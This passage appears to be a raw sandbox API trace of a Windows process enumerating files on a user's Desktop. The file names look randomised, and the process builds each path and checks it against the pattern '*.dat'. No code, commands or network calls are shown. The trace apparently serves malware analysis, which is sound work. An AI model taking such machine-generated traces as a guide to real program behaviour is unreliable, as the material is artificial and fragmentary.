lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8827190, ftCreationTime.dwHighDateTime=0x1d7aa97, ftLastAccessTime.dwLowDateTime=0x8be18a00, ftLastAccessTime.dwHighDateTime=0x1d7ac64, ftLastWriteTime.dwLowDateTime=0x8be18a00, ftLastWriteTime.dwHighDateTime=0x1d7ac64, nFileSizeHigh=0x0, nFileSizeLow=0xefc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="VAHC8zDa9SevTeoKicIh.docx", cAlternateFileName="VAHC8Z~1.DOC")) returned 1 [0110.759] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.759] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.759] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="VAHC8zDa9SevTeoKicIh.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx" [0110.759] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.759] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.759] lstrcatW (in: lpString1="\\", lpString2="VAHC8zDa9SevTeoKicIh.docx" | out: lpString1="\\VAHC8zDa9SevTeoKicIh.docx") returned="\\VAHC8zDa9SevTeoKicIh.docx" [0110.759] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.759] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a2df8 [0110.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x29a2df8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", lpUsedDefaultChar=0x0) returned 57 [0110.759] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.759] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab28 [0110.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab28, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.760] PathMatchSpecW (pszFile="VAHC8zDa9SevTeoKicIh.docx", pszSpec="*.dat") returned 0 [0110.760] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb7dc60, ftCreationTime.dwHighDateTime=0x1d7aa10, ftLastAccessTime.dwLowDateTime=0xa18851b0, ftLastAccessTime.dwHighDateTime=0x1d7ac6c, ftLastWriteTime.dwLowDateTime=0xa18851b0, ftLastWriteTime.dwHighDateTime=0x1d7ac6c, nFileSizeHigh=0x0, nFileSizeLow=0x10367, dwReserved0=0x0, dwReserved1=0x0, cFileName="VbI-8gh.mkv", cAlternateFileName="")) returned 1 [0110.760] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.760] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.760] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="VbI-8gh.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv" [0110.760] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.760] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.760] lstrcatW (in: lpString1="\\", lpString2="VbI-8gh.mkv" | out: lpString1="\\VbI-8gh.mkv") returned="\\VbI-8gh.mkv" [0110.760] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.760] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", lpUsedDefaultChar=0x0) returned 43 [0110.760] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.760] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaae0 [0110.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaae0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.760] PathMatchSpecW (pszFile="VbI-8gh.mkv", pszSpec="*.dat") returned 0 [0110.760] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51556710, ftCreationTime.dwHighDateTime=0x1d7a815, ftLastAccessTime.dwLowDateTime=0xb84e1ac0, ftLastAccessTime.dwHighDateTime=0x1d7a9ff, ftLastWriteTime.dwLowDateTime=0xb84e1ac0, ftLastWriteTime.dwHighDateTime=0x1d7a9ff, nFileSizeHigh=0x0, nFileSizeLow=0x888f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wwAL7t.mp4", cAlternateFileName="")) returned 1 [0110.760] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.760] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.760] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="wwAL7t.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4" [0110.760] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.760] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.760] lstrcatW (in: lpString1="\\", lpString2="wwAL7t.mp4" | out: lpString1="\\wwAL7t.mp4") returned="\\wwAL7t.mp4" [0110.760] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.761] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.761] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.761] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaaf8 [0110.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaaf8, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.761] PathMatchSpecW (pszFile="wwAL7t.mp4", pszSpec="*.dat") returned 0 [0110.761] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa619a40, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x562811b0, ftLastAccessTime.dwHighDateTime=0x1d7af50, ftLastWriteTime.dwLowDateTime=0x562811b0, ftLastWriteTime.dwHighDateTime=0x1d7af50, nFileSizeHigh=0x0, nFileSizeLow=0x1057b, dwReserved0=0x0, dwReserved1=0x0, cFileName="XDMAiqRYF.jpg", cAlternateFileName="XDMAIQ~1.JPG")) returned 1 [0110.761] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.761] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.761] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="XDMAiqRYF.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg" [0110.761] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.761] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.761] lstrcatW (in: lpString1="\\", lpString2="XDMAiqRYF.jpg" | out: lpString1="\\XDMAiqRYF.jpg") returned="\\XDMAiqRYF.jpg" [0110.761] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.761] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.761] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.761] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac48 [0110.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac48, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.761] PathMatchSpecW (pszFile="XDMAiqRYF.jpg", pszSpec="*.dat") returned 0 [0110.761] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99eb9cb0, ftCreationTime.dwHighDateTime=0x1d7aca7, ftLastAccessTime.dwLowDateTime=0x28bfee50, ftLastAccessTime.dwHighDateTime=0x1d7ae51, ftLastWriteTime.dwLowDateTime=0x28bfee50, ftLastWriteTime.dwHighDateTime=0x1d7ae51, nFileSizeHigh=0x0, nFileSizeLow=0x1505d, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmxJletH7GW6y.bmp", cAlternateFileName="XMXJLE~1.BMP")) returned 1 [0110.761] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.761] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.761] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="xmxJletH7GW6y.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp" [0110.761] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.762] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.762] lstrcatW (in: lpString1="\\", lpString2="xmxJletH7GW6y.bmp" | out: lpString1="\\xmxJletH7GW6y.bmp") returned="\\xmxJletH7GW6y.bmp" [0110.762] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.762] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea898 [0110.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x38ea898, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", lpUsedDefaultChar=0x0) returned 49 [0110.762] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b70 [0110.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.762] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaae0 [0110.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaae0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.762] PathMatchSpecW (pszFile="xmxJletH7GW6y.bmp", pszSpec="*.dat") returned 0 [0110.762] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf995fa10, ftCreationTime.dwHighDateTime=0x1d7a3b6, ftLastAccessTime.dwLowDateTime=0x6882a8f0, ftLastAccessTime.dwHighDateTime=0x1d7aec6, ftLastWriteTime.dwLowDateTime=0x6882a8f0, ftLastWriteTime.dwHighDateTime=0x1d7aec6, nFileSizeHigh=0x0, nFileSizeLow=0x94d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yBTl 8ysJ.mp3", cAlternateFileName="YBTL8Y~1.MP3")) returned 1 [0110.762] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.762] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.762] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="yBTl 8ysJ.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3" [0110.762] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.762] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.762] lstrcatW (in: lpString1="\\", lpString2="yBTl 8ysJ.mp3" | out: lpString1="\\yBTl 8ysJ.mp3") returned="\\yBTl 8ysJ.mp3" [0110.762] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.762] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", lpUsedDefaultChar=0x0) returned 45 [0110.762] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.762] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aabd0 [0110.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aabd0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.762] PathMatchSpecW (pszFile="yBTl 8ysJ.mp3", pszSpec="*.dat") returned 0 [0110.763] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e10ef30, ftCreationTime.dwHighDateTime=0x1d7a5be, ftLastAccessTime.dwLowDateTime=0xe222b410, ftLastAccessTime.dwHighDateTime=0x1d7a972, ftLastWriteTime.dwLowDateTime=0xe222b410, ftLastWriteTime.dwHighDateTime=0x1d7a972, nFileSizeHigh=0x0, nFileSizeLow=0x1616d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZyW0U6HGvR1sY4.mkv", cAlternateFileName="ZYW0U6~1.MKV")) returned 1 [0110.763] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.763] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.763] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="ZyW0U6HGvR1sY4.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv" [0110.763] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.763] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.763] lstrcatW (in: lpString1="\\", lpString2="ZyW0U6HGvR1sY4.mkv" | out: lpString1="\\ZyW0U6HGvR1sY4.mkv") returned="\\ZyW0U6HGvR1sY4.mkv" [0110.763] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.763] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea6d8 [0110.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x38ea6d8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", lpUsedDefaultChar=0x0) returned 50 [0110.763] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0110.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.763] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac18 [0110.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac18, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.763] PathMatchSpecW (pszFile="ZyW0U6HGvR1sY4.mkv", pszSpec="*.dat") returned 0 [0110.763] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 1 [0110.763] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.763] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.763] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="_aNuOe6kDQsgIz0qDq.ods" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods" [0110.763] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.763] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.763] lstrcatW (in: lpString1="\\", lpString2="_aNuOe6kDQsgIz0qDq.ods" | out: lpString1="\\_aNuOe6kDQsgIz0qDq.ods") returned="\\_aNuOe6kDQsgIz0qDq.ods" [0110.763] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.764] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x36) returned 0x38ea658 [0110.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x38ea658, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", lpUsedDefaultChar=0x0) returned 54 [0110.766] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b70 [0110.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.766] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab40 [0110.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab40, 